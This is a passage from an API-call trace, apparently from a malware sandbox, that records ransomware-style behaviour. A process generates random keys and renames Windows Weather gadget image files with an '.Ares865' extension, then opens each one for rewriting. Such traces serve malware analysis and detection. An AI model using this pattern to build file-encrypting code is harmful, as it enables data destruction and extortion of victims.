pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.124] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.137] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png.Ares865") returned 94 [0116.137] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png.ares865"), dwFlags=0x1) returned 1 [0116.148] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.150] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3432) returned 1 [0116.151] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.160] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.160] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.169] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.178] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.178] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.181] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png.Ares865") returned 99 [0116.181] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png.ares865"), dwFlags=0x1) returned 1 [0116.191] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.192] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3456) returned 1 [0116.194] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.206] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.209] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.218] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.229] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.230] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png.Ares865") returned 99 [0116.237] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png.ares865"), dwFlags=0x1) returned 1 [0116.245] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-horizontal.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-horizontal.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.245] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2814) returned 1 [0116.245] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.246] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.246] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.249] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.249] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.249] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.250] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png.Ares865") returned 97 [0116.250] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png.ares865"), dwFlags=0x1) returned 1 [0116.252] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.252] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2813) returned 1 [0116.252] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.253] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.253] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.258] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.267] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.267] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.271] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png.Ares865") returned 95 [0116.271] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png.ares865"), dwFlags=0x1) returned 1 [0116.282] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked-loading.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked-loading.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.283] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8801) returned 1 [0116.285] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.297] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.297] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.306] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.307] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.307] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.307] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png.Ares865") returned 100 [0116.307] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.313] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.314] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10062) returned 1 [0116.316] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.317] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.317] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.319] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.320] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.320] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.321] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png.Ares865") returned 105 [0116.321] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png.ares865"), dwFlags=0x1) returned 1 [0116.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_few-showers.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_few-showers.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.323] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=9861) returned 1 [0116.323] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.324] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.324] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.330] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.334] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.334] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.337] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png.Ares865") returned 99 [0116.337] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png.ares865"), dwFlags=0x1) returned 1 [0116.350] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_foggy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_foggy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.352] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10544) returned 1 [0116.354] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.357] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.357] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.360] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.360] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.360] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.361] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png.Ares865") returned 98 [0116.361] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png.ares865"), dwFlags=0x1) returned 1 [0116.363] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_hail.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_hail.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.363] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11882) returned 1 [0116.363] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.364] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.364] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.370] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.371] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.371] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.372] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png.Ares865") returned 112 [0116.372] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png.ares865"), dwFlags=0x1) returned 1 [0116.373] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.373] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8564) returned 1 [0116.373] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.374] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.374] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.379] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.381] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.381] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.382] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.Ares865") returned 126 [0116.382] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.383] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.383] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=10958) returned 1 [0116.384] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.384] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.384] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.387] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.388] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.388] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.388] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png.Ares865") returned 103 [0116.389] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png.ares865"), dwFlags=0x1) returned 1 [0116.390] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.390] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8804) returned 1 [0116.390] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.391] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.391] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.396] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.397] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.397] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.397] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png.Ares865") returned 117 [0116.397] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png.ares865"), dwFlags=0x1) returned 1 [0116.399] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-full_partly-cloudy.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-full_partly-cloudy.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0116.399] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=11053) returned 1 [0116.400] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0160) returned 1 [0116.400] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0116.400] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.409] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0160) returned 1 [0116.410] CryptGenRandom (in: hProv=0x2f0160, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0116.410] CryptReleaseContext (hProv=0x2f0160, dwFlags=0x0) returned 1 [0116.410] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png.Ares865") returned 111 [0116.411] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png" (normalized: 